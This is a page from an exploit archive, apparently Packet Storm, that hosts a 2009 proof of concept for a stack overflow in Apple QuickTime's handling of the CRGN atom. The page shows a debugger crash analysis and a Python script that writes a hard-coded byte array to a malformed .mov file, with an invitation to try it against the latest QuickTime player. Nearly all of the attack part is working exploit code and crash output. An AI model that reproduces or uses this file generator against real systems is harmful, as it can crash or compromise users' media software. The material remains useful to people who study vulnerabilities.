exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Apple QuickTime CRGN Atom Overflow

Apple QuickTime CRGN Atom Overflow
Posted Jun 15, 2009
Authored by webDEViL

Apple QuickTime CRGN Atom stack overflow exploit that creates a malicious .mov file.

tags | exploit, overflow
systems | apple
SHA-256 | fb8e543a1b14d05da7d1eaf72adb2dc68be619562fc03383b54d35808421f260

Apple QuickTime CRGN Atom Overflow

Change Mirror Download
Try it with your latest quicktime player.
--------------------------------------------------------------

#0:000> !exploitable -v
#HostMachine\HostUser
#Executing Processor Architecture is x86
#Debuggee is in User Mode
#Debuggee is a live user mode debugging session on the local machine
#Event Type: Exception
#Exception Faulting Address: 0x66830f9b
#First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC00000FD)
#
#Faulting Instruction:66830f9b push ebx
#
#Basic Block:
# 66830f9b push ebx
# Tainted Input Operands: ebx
# 66830f9c push ebp
# 66830f9d mov ebp,dword ptr <unloaded_papi.dll>+0x41f (00000420)[esp]
# 66830fa4 push esi
# 66830fa5 push edi
# 66830fa6 mov edi,ecx
# 66830fa8 cmp edi,offset <unloaded_papi.dll>+0x5ff (00000600)
# 66830fae mov ebx,edx
# 66830fb0 mov dword ptr [esp+14h],eax
# 66830fb4 mov byte ptr [esp+10h],0
# 66830fb9 mov byte ptr [esp+11h],0
# 66830fbe mov byte ptr [esp+12h],0
# 66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4)
#
#Exception Hash (Major/Minor): 0x614b6671.0x614b786e
#
#Stack Trace:
#QuickTime!DllMain+0x2fabb
#<Unloaded_papi.dll>+0x1231137
#Instruction Address: 0x66830f9b
#
#Description: Stack Overflow
#Short Description: StackOverflow
#Exploitability Classification: UNKNOWN
#Recommended Bug Title: Stack Overflow starting at
QuickTime!DllMain+0x2fabb (Hash=0x614b6671.0x614b786e)

print "------------------------------"
print "w3bd3vil [at] gmail [dot] com"
print "Apple QuickTime CRGN Atom 0day"
print "------------------------------"
bytes = [
0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70,
0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67,
0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00,
0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00,
0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02,
0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,
0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B,
0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF,
0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00,
0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00,
0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63,
0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00,
0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00,
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72,
0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ]

f = open("webDEViL.mov", "wb")
for byte in bytes: f.write("%c" % byte)
f.close()
print "webDEViL.mov created! (%d bytes)" % len(bytes)
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close